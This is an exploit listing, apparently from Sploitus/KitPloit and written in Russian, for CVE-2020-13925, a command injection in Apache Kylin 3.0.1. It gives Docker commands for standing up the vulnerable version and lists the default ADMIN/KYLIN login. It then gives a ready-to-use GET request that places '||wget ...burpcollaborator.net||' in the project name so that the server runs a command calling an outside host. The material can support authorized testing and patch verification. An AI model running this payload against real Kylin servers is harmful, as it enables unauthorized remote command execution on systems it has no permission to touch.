Sploitus

Exploit for CVE-2020-13925

kitploit · 2026-08-30

Exploit Code

MARKDOWN47 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BIT4WOO-CVE-2020-13925
# CVE-2020-13925

### Развертывание окружения

Следуйте https://github.com/apache/kylin для развертывания окружения с помощью Docker, измените версию на 3.0.1 (уязвимая версия). Можно удалить 【-m 8G \ 】 — он задает выделение памяти.

Затем перейдите по http://host:7070/kylin/login. Имя пользователя и пароль по умолчанию: `ADMIN/KYLIN`.

root@kitploit:~
    
    
    docker pull apachekylin/apache-kylin-standalone:3.0.1
    
    docker run -d \
        -m 8G \
        -p 7070:7070 \
        -p 8088:8088 \
        -p 50070:50070 \
        -p 8032:8032 \
        -p 8042:8042 \
        -p 16010:16010 \
        apachekylin/apache-kylin-standalone:3.0.1
        
    docker run -d \
        -p 7070:7070 \
        -p 8088:8088 \
        -p 50070:50070 \
        -p 8032:8032 \
        -p 8042:8042 \
        -p 16010:16010 \
        apachekylin/apache-kylin-standalone:3.0.1
    

### Проверка уязвимости PoC

root@kitploit:~
    
    
    Исходный запрос:
    http://host:port/kylin/api/diag/project/learn_kylin/download
            
    PoC-запрос, метод GET:
    http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
    
    Просто замените имя проекта "learn_kylin" на следующий payload:
    ||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||